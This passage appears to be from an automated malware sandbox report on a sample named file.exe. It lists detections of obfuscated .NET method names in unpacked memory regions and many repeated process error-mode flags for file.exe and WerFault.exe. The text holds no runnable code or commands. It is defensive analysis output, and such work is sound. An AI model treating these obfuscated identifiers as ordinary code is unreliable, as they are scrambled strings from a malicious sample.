                Source: 0.2.file.exe.3cb4880.2.raw.unpack, ptp44AClmmRtQwH9OI.csHigh entropy of concatenated method names: 'ToString', 'tdRSjAuCL2', 'vlpStaSIXQ', 'TceSPqTDsS', 'Bt9SVYOBST', 'Qs4SoiFpkx', 'iKsSLdxaov', 'vQXSslo1ZX', 'aPLSIAVPNL', 'kVrSdEx01Y'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, jLx6J97JddKSKVYCTS.csHigh entropy of concatenated method names: 's93lrr8wfd', 'ykEln3DW2y', 'tUWmPJDbcU', 'oBQmV4XZ5x', 'm5umoQZS7G', 'UxEmLqUfEo', 'WErmslwgX8', 'c3lmIRlArf', 'BZMmdLJcY9', 'iTXmaCgd7P'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, na4FDnyOExEDDqNAoT.csHigh entropy of concatenated method names: 'UTfbhaJOGo', 'WF1bGoWCRr', 'nlrblMd6UV', 'weRbuAW658', 'Sr6bQ6XeZJ', 'G7KlBAEQey', 'Se5l6HQA00', 'Yf9lf5UgyY', 'OqQl4NviYc', 'muNlvPoewb'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, f3Qs7tzUqjxaSIcVDe.csHigh entropy of concatenated method names: 'I54Nq9X8iG', 'TECNUEvGYG', 'KZrNg0a8fA', 'Iq2NySjNJO', 'BDoNtAD3Bw', 'UDxNVS0jrq', 'n26NooBjZC', 'vKANcpcTbd', 'yFXN3dQRKn', 'D6INxP5FLu'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, vnF8bQU8cHxQZQTDPO.csHigh entropy of concatenated method names: 'mNsGZ7INQj', 'xZKG0klSJL', 'SQKGCDPHZo', 'scpGkuyfAc', 'ulOGBbxHVG', 'LgsG6yRm6U', 'D5WGfNXJcm', 'QZJG4rwhQh', 'GAZGvCYEJ3', 'ciLG59xxUY'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, MUKi7nQ9sYvdsQsUSw.csHigh entropy of concatenated method names: 'I4XpheYnAV', 'MTbpi5Olg9', 'ytIpGkMV1P', 'gxxpmLSZpp', 'HELpluRH8R', 'DmZpbZNVPp', 'D5bpuJ1SgR', 'zHwpQJrGDr', 'QTYpwCFCPd', 'OgZpKGZEMb'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, HSyrTIdPhOoMhSTO09.csHigh entropy of concatenated method names: 'WwBu3XdQUu', 'pVCux9wHir', 'j5MuF9b0fL', 'Lo3u88sKev', 'DYjurUP7Dm', 'hTIuq0j2Tf', 'lI3uniw50x', 'tQDuUvc3fA', 'KsuuggdwO0', 'Q4xu7AUKEF'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, faWF1Wf4SQe0KVDGFl.csHigh entropy of concatenated method names: 'oRqeRSv8bF', 'p5aeMM9RCt', 'u4seeJXmdb', 'IcMeH7Fdtn', 'RrAeTMJ6um', 'GWvec0Fo40', 'Dispose', 'BAbWi6mvi4', 'OPIWGFagv1', 'G4JWmeNfNo'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, iZcjPAkifOk9vWysUs.csHigh entropy of concatenated method names: 'Y6eMKxIkDK', 'V6JM1FyNVb', 'ToString', 'PjNMiK5ipU', 'Yq7MGZI05r', 'w50Mmj0q3k', 'ymwMlqN2aE', 'sqjMbKhBHg', 'zJsMumawNj', 'hOuMQ38rre'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, K234AYgBjhLT3xkslG.csHigh entropy of concatenated method names: 'Y6im8T1CdS', 'ovRmqoDav8', 'GXGmUcLeXb', 'MNpmgN77iC', 'VP5mRTnTMO', 'pQPmSmifIV', 'R72mMaJyst', 'RLcmWGMO7C', 'njemeRuqnQ', 'I08mNPuXnY'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, UttuLpGkkmZ8KDhNJ7.csHigh entropy of concatenated method names: 'Dispose', 'ke0DvKVDGF', 'WRIXtyWi6G', 'Pkm0a3a8Th', 'iCRD5BM7Ae', 'gW2DzwRpxh', 'ProcessDialogKey', 'tK0XEdqTBF', 'N6fXDRiC1g', 'YH7XXTfb7K'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, RdqTBFva6fRiC1g5H7.csHigh entropy of concatenated method names: 'JVgeyCmOVh', 'lnKet0YKC6', 'Dr0ePwcOAB', 'evceVbuYrd', 'rOQeoS7JRe', 'eOveLFRSxe', 'AMdes6mldK', 'eJ2eIukFtg', 'jUhedqMgsM', 'y4xeapSPHF'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, S3CT9ADEFVNxFGFiYcA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aaqNjFhnoK', 'yGjN2tNRx0', 'DiRN9cohO7', 'igoNZFkbxK', 'fVZN0YTngn', 'CmONCyQLKo', 'MAfNkaUwTD'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, btw8khDDwIfUUo5yHPb.csHigh entropy of concatenated method names: 'qSoN5joCIo', 'yUhNzdNnYn', 'LyRHEnBvVZ', 'QMkHDWeHc2', 'rNTHXVfuFB', 'EsSHpW9XxO', 'jn5HO2tOXi', 'wjWHh1e4sb', 'NDAHiA5oTR', 'wmiHGsDPoE'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, yytPU1sONoyt1BjlC2.csHigh entropy of concatenated method names: 'bEquiKZfs1', 'mJsumn5sCJ', 'rYiubemykZ', 'T3Ab5tmEYx', 'iM2bzZau7V', 'awLuEjWtgB', 'GsyuDfQOOJ', 'pt4uXZTORb', 'J81updjFoV', 'RcFuOEAfuK'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, Bu0C3TXbaFoYSwWkSy.csHigh entropy of concatenated method names: 'mHWFkgepb', 'Brw82RF5p', 'ITYqmEwcK', 'rkAnBYdF3', 'bDfg2pHnM', 'pFh7ArfRA', 'd6dpvw7RApF8NuAwpZ', 'PxdwBw3hoMF68KiFhn', 'tLyW5yRx7', 'nuEN7xYx7'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, vfb7Ke59TSLxHTW0EU.csHigh entropy of concatenated method names: 'R6kNmcfPph', 'r8KNllVvVk', 'SRxNbVEj0s', 'aTMNuuhdqZ', 'kGjNeTfW5f', 'djHNQdWy4q', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, Qr8SemmafTEU7mZ8y0.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uwKXvyrnkg', 'rXQX5QSESK', 'T1qXza4Bsk', 'YdmpEyeFcx', 'E74pDNLR8A', 'fygpXiQfsL', 'NODppg9wx0', 'YbQLHj4SZN4XahxgmUJ'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, iYx3As6YC78M6Yk1NW.csHigh entropy of concatenated method names: 'tctM4upspg', 'rZqM5fXVfN', 'SH2WEDKcfZ', 'yj0WDWX5ip', 'N7yMjwDkvs', 'xi5M2hJZmD', 'dYfM9f2W6N', 'cDrMZnFH1I', 'ObtM0PD5Un', 'bodMCNrjnX'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, OxjRhtOH873C4t1wPt.csHigh entropy of concatenated method names: 'kWTDunF8bQ', 'AcHDQxQZQT', 'wBjDKhLT3x', 'TslD1GuLx6', 'JYCDRTSJa4', 'zDnDSOExED', 'T4MZLmQy3aCWr54XmB', 'oPk9JoCnByHwyEBIGJ', 'EixDD3ONge', 'n8BDpBPlnU'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, SaCVJsDO13IhBQaxLAA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GkKAeYTaNN', 'YhhANZTvoL', 'ubBAH55ptU', 'cRZAA4PbvF', 't3nAT2lvq0', 'F04AY4K3YM', 'rFaAcSjb1k'
                Source: 0.2.file.exe.7550000.5.raw.unpack, HyrVjh9CacVo9sXnV4.csHigh entropy of concatenated method names: 'TqcJU9MtB4', 'RhCJg5yxnH', 'pNPJyqfJr3', 'kBPJtEGKNx', 'LX2JVM1k2x', 'QRvJo8xwQH', 'Xw9JsVEiws', 'Lm5JInXkYD', 'VN8JaIks2b', 'IltJjbvrF6'
                Source: 0.2.file.exe.7550000.5.raw.unpack, ptp44AClmmRtQwH9OI.csHigh entropy of concatenated method names: 'ToString', 'tdRSjAuCL2', 'vlpStaSIXQ', 'TceSPqTDsS', 'Bt9SVYOBST', 'Qs4SoiFpkx', 'iKsSLdxaov', 'vQXSslo1ZX', 'aPLSIAVPNL', 'kVrSdEx01Y'
                Source: 0.2.file.exe.7550000.5.raw.unpack, jLx6J97JddKSKVYCTS.csHigh entropy of concatenated method names: 's93lrr8wfd', 'ykEln3DW2y', 'tUWmPJDbcU', 'oBQmV4XZ5x', 'm5umoQZS7G', 'UxEmLqUfEo', 'WErmslwgX8', 'c3lmIRlArf', 'BZMmdLJcY9', 'iTXmaCgd7P'
                Source: 0.2.file.exe.7550000.5.raw.unpack, na4FDnyOExEDDqNAoT.csHigh entropy of concatenated method names: 'UTfbhaJOGo', 'WF1bGoWCRr', 'nlrblMd6UV', 'weRbuAW658', 'Sr6bQ6XeZJ', 'G7KlBAEQey', 'Se5l6HQA00', 'Yf9lf5UgyY', 'OqQl4NviYc', 'muNlvPoewb'
                Source: 0.2.file.exe.7550000.5.raw.unpack, f3Qs7tzUqjxaSIcVDe.csHigh entropy of concatenated method names: 'I54Nq9X8iG', 'TECNUEvGYG', 'KZrNg0a8fA', 'Iq2NySjNJO', 'BDoNtAD3Bw', 'UDxNVS0jrq', 'n26NooBjZC', 'vKANcpcTbd', 'yFXN3dQRKn', 'D6INxP5FLu'
                Source: 0.2.file.exe.7550000.5.raw.unpack, vnF8bQU8cHxQZQTDPO.csHigh entropy of concatenated method names: 'mNsGZ7INQj', 'xZKG0klSJL', 'SQKGCDPHZo', 'scpGkuyfAc', 'ulOGBbxHVG', 'LgsG6yRm6U', 'D5WGfNXJcm', 'QZJG4rwhQh', 'GAZGvCYEJ3', 'ciLG59xxUY'
                Source: 0.2.file.exe.7550000.5.raw.unpack, MUKi7nQ9sYvdsQsUSw.csHigh entropy of concatenated method names: 'I4XpheYnAV', 'MTbpi5Olg9', 'ytIpGkMV1P', 'gxxpmLSZpp', 'HELpluRH8R', 'DmZpbZNVPp', 'D5bpuJ1SgR', 'zHwpQJrGDr', 'QTYpwCFCPd', 'OgZpKGZEMb'
                Source: 0.2.file.exe.7550000.5.raw.unpack, HSyrTIdPhOoMhSTO09.csHigh entropy of concatenated method names: 'WwBu3XdQUu', 'pVCux9wHir', 'j5MuF9b0fL', 'Lo3u88sKev', 'DYjurUP7Dm', 'hTIuq0j2Tf', 'lI3uniw50x', 'tQDuUvc3fA', 'KsuuggdwO0', 'Q4xu7AUKEF'
                Source: 0.2.file.exe.7550000.5.raw.unpack, faWF1Wf4SQe0KVDGFl.csHigh entropy of concatenated method names: 'oRqeRSv8bF', 'p5aeMM9RCt', 'u4seeJXmdb', 'IcMeH7Fdtn', 'RrAeTMJ6um', 'GWvec0Fo40', 'Dispose', 'BAbWi6mvi4', 'OPIWGFagv1', 'G4JWmeNfNo'
                Source: 0.2.file.exe.7550000.5.raw.unpack, iZcjPAkifOk9vWysUs.csHigh entropy of concatenated method names: 'Y6eMKxIkDK', 'V6JM1FyNVb', 'ToString', 'PjNMiK5ipU', 'Yq7MGZI05r', 'w50Mmj0q3k', 'ymwMlqN2aE', 'sqjMbKhBHg', 'zJsMumawNj', 'hOuMQ38rre'
                Source: 0.2.file.exe.7550000.5.raw.unpack, K234AYgBjhLT3xkslG.csHigh entropy of concatenated method names: 'Y6im8T1CdS', 'ovRmqoDav8', 'GXGmUcLeXb', 'MNpmgN77iC', 'VP5mRTnTMO', 'pQPmSmifIV', 'R72mMaJyst', 'RLcmWGMO7C', 'njemeRuqnQ', 'I08mNPuXnY'
                Source: 0.2.file.exe.7550000.5.raw.unpack, UttuLpGkkmZ8KDhNJ7.csHigh entropy of concatenated method names: 'Dispose', 'ke0DvKVDGF', 'WRIXtyWi6G', 'Pkm0a3a8Th', 'iCRD5BM7Ae', 'gW2DzwRpxh', 'ProcessDialogKey', 'tK0XEdqTBF', 'N6fXDRiC1g', 'YH7XXTfb7K'
                Source: 0.2.file.exe.7550000.5.raw.unpack, RdqTBFva6fRiC1g5H7.csHigh entropy of concatenated method names: 'JVgeyCmOVh', 'lnKet0YKC6', 'Dr0ePwcOAB', 'evceVbuYrd', 'rOQeoS7JRe', 'eOveLFRSxe', 'AMdes6mldK', 'eJ2eIukFtg', 'jUhedqMgsM', 'y4xeapSPHF'
                Source: 0.2.file.exe.7550000.5.raw.unpack, S3CT9ADEFVNxFGFiYcA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aaqNjFhnoK', 'yGjN2tNRx0', 'DiRN9cohO7', 'igoNZFkbxK', 'fVZN0YTngn', 'CmONCyQLKo', 'MAfNkaUwTD'
                Source: 0.2.file.exe.7550000.5.raw.unpack, btw8khDDwIfUUo5yHPb.csHigh entropy of concatenated method names: 'qSoN5joCIo', 'yUhNzdNnYn', 'LyRHEnBvVZ', 'QMkHDWeHc2', 'rNTHXVfuFB', 'EsSHpW9XxO', 'jn5HO2tOXi', 'wjWHh1e4sb', 'NDAHiA5oTR', 'wmiHGsDPoE'
                Source: 0.2.file.exe.7550000.5.raw.unpack, yytPU1sONoyt1BjlC2.csHigh entropy of concatenated method names: 'bEquiKZfs1', 'mJsumn5sCJ', 'rYiubemykZ', 'T3Ab5tmEYx', 'iM2bzZau7V', 'awLuEjWtgB', 'GsyuDfQOOJ', 'pt4uXZTORb', 'J81updjFoV', 'RcFuOEAfuK'
                Source: 0.2.file.exe.7550000.5.raw.unpack, Bu0C3TXbaFoYSwWkSy.csHigh entropy of concatenated method names: 'mHWFkgepb', 'Brw82RF5p', 'ITYqmEwcK', 'rkAnBYdF3', 'bDfg2pHnM', 'pFh7ArfRA', 'd6dpvw7RApF8NuAwpZ', 'PxdwBw3hoMF68KiFhn', 'tLyW5yRx7', 'nuEN7xYx7'
                Source: 0.2.file.exe.7550000.5.raw.unpack, vfb7Ke59TSLxHTW0EU.csHigh entropy of concatenated method names: 'R6kNmcfPph', 'r8KNllVvVk', 'SRxNbVEj0s', 'aTMNuuhdqZ', 'kGjNeTfW5f', 'djHNQdWy4q', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.file.exe.7550000.5.raw.unpack, Qr8SemmafTEU7mZ8y0.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uwKXvyrnkg', 'rXQX5QSESK', 'T1qXza4Bsk', 'YdmpEyeFcx', 'E74pDNLR8A', 'fygpXiQfsL', 'NODppg9wx0', 'YbQLHj4SZN4XahxgmUJ'
                Source: 0.2.file.exe.7550000.5.raw.unpack, iYx3As6YC78M6Yk1NW.csHigh entropy of concatenated method names: 'tctM4upspg', 'rZqM5fXVfN', 'SH2WEDKcfZ', 'yj0WDWX5ip', 'N7yMjwDkvs', 'xi5M2hJZmD', 'dYfM9f2W6N', 'cDrMZnFH1I', 'ObtM0PD5Un', 'bodMCNrjnX'
                Source: 0.2.file.exe.7550000.5.raw.unpack, OxjRhtOH873C4t1wPt.csHigh entropy of concatenated method names: 'kWTDunF8bQ', 'AcHDQxQZQT', 'wBjDKhLT3x', 'TslD1GuLx6', 'JYCDRTSJa4', 'zDnDSOExED', 'T4MZLmQy3aCWr54XmB', 'oPk9JoCnByHwyEBIGJ', 'EixDD3ONge', 'n8BDpBPlnU'
                Source: 0.2.file.exe.7550000.5.raw.unpack, SaCVJsDO13IhBQaxLAA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GkKAeYTaNN', 'YhhANZTvoL', 'ubBAH55ptU', 'cRZAA4PbvF', 't3nAT2lvq0', 'F04AY4K3YM', 'rFaAcSjb1k'
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
